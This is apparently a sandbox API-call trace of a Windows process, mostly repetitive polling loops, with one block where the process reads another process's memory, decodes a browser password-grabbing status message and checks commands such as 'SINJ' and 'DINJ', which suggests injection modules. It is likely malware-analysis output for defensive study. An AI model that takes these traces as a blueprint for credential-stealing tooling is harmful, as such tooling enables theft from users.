	[0208.410] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0208.413] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0208.413] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b1bc8) returned 1
	[0208.413] Sleep (dwMilliseconds=0xbb8) 
	[0208.436] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1bc8
	[0208.437] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0208.437] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0208.438] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b1bc8) returned 1
	[0208.438] Sleep (dwMilliseconds=0xbb8) 
	[0208.453] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1bc8
	[0208.455] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0208.455] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0208.456] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b1bc8) returned 1
	[0208.456] Sleep (dwMilliseconds=0xbb8) 
	[0208.463] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1bc8
	[0208.466] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0208.466] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0208.466] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b1bc8) returned 1
	[0208.466] Sleep (dwMilliseconds=0xbb8) 
	[0208.590] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc2d8
	[0208.590] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0208.590] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0208.590] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cc2d8) returned 1
	[0208.590] Sleep (dwMilliseconds=0xbb8) 
	[0208.604] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc2d8
	[0208.604] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0208.604] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0208.604] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cc2d8) returned 1
	[0208.604] Sleep (dwMilliseconds=0xbb8) 
	[0208.619] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b1cb8
	[0208.619] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0208.619] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0208.619] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b1cb8) returned 1
	[0208.619] Sleep (dwMilliseconds=0xbb8) 
	[0208.635] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26b2168
	[0208.635] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0208.635] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0208.635] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b2168) returned 1
	[0208.635] Sleep (dwMilliseconds=0xbb8) 
	[0211.880] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0211.880] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x102
	[0211.880] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2259f0
	[0211.880] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x22ba9c8
	[0211.880] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225968
	[0211.880] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0211.880] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x1adf91b, lpBuffer=0x2259f0, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2259f0*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0211.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2259f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0211.880] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff660
	[0211.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2259f0, cbMultiByte=-1, lpWideCharStr=0x22ff660, cchWideChar=5 | out: lpWideCharStr="DPST") returned 5
	[0211.880] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x1adf424, lpBuffer=0x22ba9c8, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x22ba9c8*, lpNumberOfBytesRead=0x248fe0c*=0x3ff) returned 1
	[0211.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ba9c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45
	[0211.880] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x60) returned 0x22620e8
	[0211.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ba9c8, cbMultiByte=-1, lpWideCharStr=0x22620e8, cchWideChar=45 | out: lpWideCharStr="Failed to grab passwords: No passwords found") returned 45
	[0211.880] ReadProcessMemory (in: hProcess=0x4a8, lpBaseAddress=0x1adf3f8, lpBuffer=0x225968, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225968*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0211.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225968, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0211.881] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc238
	[0211.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225968, cbMultiByte=-1, lpWideCharStr=0x26cc238, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0211.881] SetEvent (hEvent=0x49c) returned 1
	[0211.881] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2259f0) returned 1
	[0211.882] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ba9c8) returned 1
	[0211.882] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225968) returned 1
	[0211.882] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cc418
	[0211.882] lstrcmpiW (lpString1="DPST", lpString2="ModuleQuery") returned -1
	[0211.882] lstrcmpiW (lpString1="DPST", lpString2="WantRelease") returned -1
	[0211.882] lstrcmpiW (lpString1="DPST", lpString2="VERS") returned -1
	[0211.882] lstrcmpiW (lpString1="DPST", lpString2="SINJ") returned -1
	[0211.882] lstrcmpiW (lpString1="DPST", lpString2="DINJ") returned 1
	[0211.882] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff678
	[0211.882] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x26cc1e8, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0x754) returned 0x590
	[0211.882] Sleep (dwMilliseconds=0xbb8) 
	[0211.895] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0211.895] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0211.895] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cc210) returned 1
	[0211.895] Sleep (dwMilliseconds=0xbb8) 
	[0211.911] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0211.911] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0211.911] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cc210) returned 1
	[0211.911] Sleep (dwMilliseconds=0xbb8) 
	[0211.926] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0211.927] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0211.927] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cc210) returned 1
	[0211.927] Sleep (dwMilliseconds=0xbb8) 
	[0211.955] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0211.955] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0211.956] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cc350) returned 1
	[0211.956] Sleep (dwMilliseconds=0xbb8) 
	[0211.958] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0211.958] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0211.958] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cc350) returned 1
	[0211.958] Sleep (dwMilliseconds=0xbb8) 
	[0211.973] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0211.973] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0211.973] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cc350) returned 1
	[0211.973] Sleep (dwMilliseconds=0xbb8) 
	[0211.999] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0211.999] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0211.999] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cc350) returned 1
	[0211.999] Sleep (dwMilliseconds=0xbb8) 
	[0212.005] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.005] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.005] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cc350) returned 1
	[0212.005] Sleep (dwMilliseconds=0xbb8) 
	[0212.021] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.021] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.021] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cc350) returned 1
	[0212.021] Sleep (dwMilliseconds=0xbb8) 
	[0212.036] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.036] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.037] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cc350) returned 1
	[0212.037] Sleep (dwMilliseconds=0xbb8) 
	[0212.052] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.052] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.052] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cc350) returned 1
	[0212.052] Sleep (dwMilliseconds=0xbb8) 
	[0212.067] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.067] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.068] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cc350) returned 1
	[0212.068] Sleep (dwMilliseconds=0xbb8) 
	[0212.083] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.083] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.083] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cc350) returned 1
	[0212.083] Sleep (dwMilliseconds=0xbb8) 
	[0212.098] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.098] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.098] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cc350) returned 1
	[0212.098] Sleep (dwMilliseconds=0xbb8) 
	[0212.114] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.114] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.114] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cc350) returned 1
	[0212.114] Sleep (dwMilliseconds=0xbb8) 
	[0212.129] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.129] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.129] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.129] Sleep (dwMilliseconds=0xbb8) 
	[0212.145] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.145] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.145] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.145] Sleep (dwMilliseconds=0xbb8) 
	[0212.161] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.161] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.161] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.161] Sleep (dwMilliseconds=0xbb8) 
	[0212.176] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.176] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.176] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.176] Sleep (dwMilliseconds=0xbb8) 
	[0212.192] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.192] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.192] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.192] Sleep (dwMilliseconds=0xbb8) 
	[0212.208] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.208] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.208] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.208] Sleep (dwMilliseconds=0xbb8) 
	[0212.223] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.223] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.223] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.223] Sleep (dwMilliseconds=0xbb8) 
	[0212.239] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.239] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.239] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.239] Sleep (dwMilliseconds=0xbb8) 
	[0212.255] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.255] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.256] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.256] Sleep (dwMilliseconds=0xbb8) 
	[0212.270] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.270] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.270] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.270] Sleep (dwMilliseconds=0xbb8) 
	[0212.285] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.286] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.286] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.286] Sleep (dwMilliseconds=0xbb8) 
	[0212.301] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.301] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.301] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.301] Sleep (dwMilliseconds=0xbb8) 
	[0212.317] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.317] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.317] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.317] Sleep (dwMilliseconds=0xbb8) 
	[0212.332] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.332] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.332] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.332] Sleep (dwMilliseconds=0xbb8) 
	[0212.348] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.348] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.348] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.349] Sleep (dwMilliseconds=0xbb8) 
	[0212.363] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.363] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.363] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.364] Sleep (dwMilliseconds=0xbb8) 
	[0212.379] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.379] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.379] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.379] Sleep (dwMilliseconds=0xbb8) 
	[0212.394] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.395] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.395] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.395] Sleep (dwMilliseconds=0xbb8) 
	[0212.410] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.410] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.410] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.410] Sleep (dwMilliseconds=0xbb8) 
	[0212.426] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.426] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.426] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.426] Sleep (dwMilliseconds=0xbb8) 
	[0212.442] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.442] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.442] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.442] Sleep (dwMilliseconds=0xbb8) 
	[0212.457] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.457] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.457] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.457] Sleep (dwMilliseconds=0xbb8) 
	[0212.483] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.483] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.483] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.483] Sleep (dwMilliseconds=0xbb8) 
	[0212.488] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.488] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.488] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.488] Sleep (dwMilliseconds=0xbb8) 
	[0212.505] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.505] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.505] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.505] Sleep (dwMilliseconds=0xbb8) 
	[0212.520] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.520] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.520] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.520] Sleep (dwMilliseconds=0xbb8) 
	[0212.535] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.535] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.536] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.536] Sleep (dwMilliseconds=0xbb8) 
	[0212.551] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.551] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.551] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.551] Sleep (dwMilliseconds=0xbb8) 
	[0212.566] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.566] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.566] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.566] Sleep (dwMilliseconds=0xbb8) 
	[0212.582] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.582] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.582] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.582] Sleep (dwMilliseconds=0xbb8) 
	[0212.597] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.597] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.597] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.597] Sleep (dwMilliseconds=0xbb8) 
	[0212.624] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.625] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.625] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.625] Sleep (dwMilliseconds=0xbb8) 
	[0212.629] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.629] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.629] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.629] Sleep (dwMilliseconds=0xbb8) 
	[0212.648] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.648] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.648] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.648] Sleep (dwMilliseconds=0xbb8) 
	[0212.661] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.661] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.661] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.661] Sleep (dwMilliseconds=0xbb8) 
	[0212.675] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.675] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.675] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.675] Sleep (dwMilliseconds=0xbb8) 
	[0212.691] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.691] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.691] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.691] Sleep (dwMilliseconds=0xbb8) 
	[0212.707] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.707] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.707] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.707] Sleep (dwMilliseconds=0xbb8) 
	[0212.724] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.724] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.724] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.724] Sleep (dwMilliseconds=0xbb8) 
	[0212.738] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.738] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.738] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.738] Sleep (dwMilliseconds=0xbb8) 
	[0212.754] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.754] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.754] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.754] Sleep (dwMilliseconds=0xbb8) 
	[0212.769] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.769] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.769] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.770] Sleep (dwMilliseconds=0xbb8) 
	[0212.785] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.785] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.785] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.785] Sleep (dwMilliseconds=0xbb8) 
	[0212.800] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0212.800] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0212.801] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26cbbd0) returned 1
	[0212.801] Sleep (dwMilliseconds=0xbb8) 
	[0212.816] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
